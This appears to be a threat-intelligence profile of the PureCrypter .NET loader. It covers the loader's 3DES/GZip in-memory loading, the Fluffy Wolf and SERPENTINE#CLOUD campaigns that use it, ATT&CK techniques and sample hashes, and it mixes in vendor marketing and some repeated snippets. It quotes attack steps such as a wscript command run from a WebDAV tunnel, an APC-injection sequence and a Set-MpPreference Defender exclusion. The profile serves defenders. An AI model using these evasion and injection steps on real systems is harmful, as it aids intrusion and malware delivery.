PureCrypter
PureCrypter is a commercial .NET crypter/loader in the PureCoder malware-as-a-service ecosystem, commonly used as a secondary dropper or resource loader to deliver additional malware. The reporting describes it as a .NET-based executable, often obfuscated with SmartAssembly or ConfuserEx, and specifically as a .NET 3DES loader. Its core behavior is to decrypt an embedded resource using 3DES-CBC, decompress it with GZip, load the resulting assembly in memory via Assembly.Load, and invoke it through reflection. Other observed PureCrypter variants are described as .NET resource loaders carrying additional encrypted inner payloads.
PureCrypter has been observed distributing multiple RATs and information stealers, including Agent Tesla, RedLine, DarkTrack RAT, and PureLogs, and it appeared among payloads distributed through the Amadey ecosystem alongside Lumma Stealer, Vidar Stealer, StealC, Rhadamanthys, SmokeLoader, XWorm, and AsyncRAT. In SERPENTINE#CLOUD-related intrusions, the delivery chain was repeatedly described as batch stager -> Python loader -> Donut shellcode -> PureCrypter -> inner RAT/payload. In one March 2026 campaign targeting German-speaking victims with fake DATEV invoice lures, two PureCrypter samples were launched via Early Bird APC injection into explorer.exe after staging through Cloudflare trycloudflare WebDAV infrastructure, WSH/WSF/BAT scripts, a downloaded Python runtime, and Donut shellcode. In Fluffy Wolf campaigns targeting Russian organizations between March and May 2026, PowerLoader downloaded and executed PureCrypter, which then deployed final payloads such as PureLogs, PureRAT, and Pay2Key ransomware.
Associated activity links PureCrypter to financially motivated malware operations and MaaS-enabled intrusion chains rather than a single exclusive actor. It was used by Fluffy Wolf against Russian organizations in construction, consulting, manufacturing, engineering, retail, e-commerce, and industrial sectors, primarily via phishing emails themed as debts, reconciliation statements, or legal claims, with malicious RAR archives or GitHub links. It also featured prominently in the SERPENTINE#CLOUD campaign tracked by Securonix and Breakglass Intelligence, which targeted German-speaking businesses with invoice-themed lures and used rotating Cloudflare tunnels, Python loaders, and Donut shellcode.
Observed capabilities and behaviors include in-memory execution of decrypted payloads, reflective loading of .NET assemblies, use as a secondary dropper for encrypted inner payloads, and defense evasion. One report states PureCrypter can send a TLS 1.2-encrypted infection message via Discord webhook. Another observed it executing Set-MpPreference -ExclusionPath to add Windows Defender exclusions. Reported indicators and sample details include loader names such as Fviwknzr.exe and Erqcke.exe; embedded resource names Jaglt and Ctjady; inner payloads including Qdjlj.dll and Mvfsxog.dll; and hashes including Fviwknzr.exe SHA256 dcd22d338a0bc4cf615d126b84dfcda149a34cf18bc43b85f16142dfb019e608, Erqcke.exe SHA256 0ab09a4787ea9cb259cadd3f811a56f7bd0058287634bbaf0388b2cd40464505, Erqcke.exe SHA256 b1c6659ee4ee35540f5ed043b611ac88a7fce9dc2f564168e7d47c43683163f6, Qdjlj.dll SHA256 cdf87d68885caa3e94713ded9dd5e51c39b7bc7ef9bf7d63a4ff5ab917a96b36, and Mvfsxog.dll SHA256 046d0e83c1e6dcaf526127b81b962042e495f5ae3a748f3a9452be62f905acf8.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
While they still leverage classic droppers like PureCrypter and Rust-based loaders running Donut shellcode, they have added a potent new tool to their arsenal: PowerLoader.
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
PureCrypter malware has been observed distributing multiple RATs and information stealers. It is a .NET-based executable, obfuscated with SmartAssembly...
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
3 techniques
Initial Access
Security researchers have uncovered a series of highly sophisticated Fluffy Wolf phishing attacks targeting Russian organizations across various critical sectors.
Using highly deceptive tactics, the attackers send emails masquerading as legitimate corporate communications regarding outstanding debts, reconciliation statements, or legal claims. To bypass modern email security gateways, the attackers heavily rely on malicious RAR attachments...
Execution
7 techniques
Execution
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh └─> Cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
The ZIP contains a Python runtime and one or more loader scripts. Each loader decrypts embedded shellcode, and that shellcode bootstraps the .NET Common Language Runtime (CLR) to load the actual payload.
Persistence
2 techniques
Persistence
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Privilege Escalation
4 techniques
Privilege Escalation
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Stealth
10 techniques
Stealth
The content repeatedly describes adversaries using Base64, XOR, RC4, AES, hexadecimal encoding, string encryption, code flattening, custom crypters, and other obfuscation methods to hide payloads, strings, configuration data, URLs, and scripts.
Mosquito’s installer is obfuscated with a custom crypter. PureCrypter has used SmartAssembly and .NET Reactor for string encryption and control flow obfuscation. PyDCrypt has been compiled and encrypted with PyInstaller using the --key flag.
Obfuscated Files: Encrypted Payload T1027.013 Multi-layer XOR + Chaskey CTR + AES
Masquerading: Match Legitimate Name T1036.005 DATEV invoice filename
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.'
Command and Control
5 techniques
Command and Control
C2 Application Layer Protocol: Web Protocols T1071.001 1–6 WebDAV over HTTPS for staging
Этот инструмент написан на C++ и запускает PowerShell в скрытом режиме, получая скрипты с управляющего сервера. Далее вредонос скачивает и запускает PureCrypter, который уже разворачивает финальную полезную нагрузку.
Other
3 techniques
Other
Defense Evasion Subvert Trust Controls: AMSI Bypass T1562.001 1, 3 Donut AMSI patch + DcRat runtime AMSI patch
The content repeatedly describes threat actors and malware disabling or modifying security tools, EDR/AV, logging, firewall rules, integrity checkers, and security settings; e.g., 'Agrius used several mechanisms to try to disable security tools' and 'BlackByte disabled security tools such as Windows Defender and the Raccine anti-ransomware tool during operations.'
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
28 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PureCrypter is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Used by Fluffy Wolf as a classic dropper in phishing campaigns to help deliver malicious payloads.
Криптер/загрузчик, который разворачивает финальную полезную нагрузку после запуска PowerLoader.
Mentioned only as related malware/reporting in the see-also section, without operational details in the main content.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.